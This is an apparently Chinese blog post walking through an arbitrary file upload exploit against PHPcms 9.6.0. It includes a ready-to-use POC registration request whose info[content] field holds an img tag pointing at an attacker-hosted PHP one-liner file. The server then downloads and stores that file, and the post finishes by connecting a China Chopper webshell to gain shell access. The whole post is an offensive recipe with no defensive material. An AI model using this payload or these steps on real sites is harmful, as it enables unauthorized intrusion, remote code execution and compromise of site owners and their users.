PHPcms9.6.0 最新版任意文件上传漏洞
2018-01-18 本文已影响45人
二潘
1、首先我们在本地搭建一个php环境,我这里是appserv(只要可以执行php文件就行),在根目录下新建一个txt文本文件里面写上php一句话,如上图可以访问
![](https://img.haomeiwen.com/i9272355/208f69c38accef50.png)
2、接着我们找到phpcms网站注册模块,随便填一下信息
![](https://img.haomeiwen.com/i9272355/4013600d45f85c56.png)
3、然后我们用burpsuite抓包
![](https://img.haomeiwen.com/i9272355/6d5fdc5b05f2ed84.png)
然后发送到repeater
![](https://img.haomeiwen.com/i9272355/f6dcc84f0f578df2.png)
我们在最下面的注册那儿使用img标签插入我们本地第一步搭建的一句话
提交的poc
siteid=1&modelid=11&username=zf1agac121&password=aasgfaewee311as&email=a1ea21f94@qq.com&info[content]=<img src=http://192.168.1.105/1.txt?.php#.jpg>&dosubmit=1&protocol=
只需要修改img里面的链接为你本地写入的一句话即可
我们可以看到repeater里MYSQL query成功插入,接着访问上图repeater里我标黄语句,执行一句话连接菜刀,getshell
![](https://img.haomeiwen.com/i9272355/a4427ad2a1633286.png)
![](https://img.haomeiwen.com/i9272355/6dbc3700c7335a2a.png)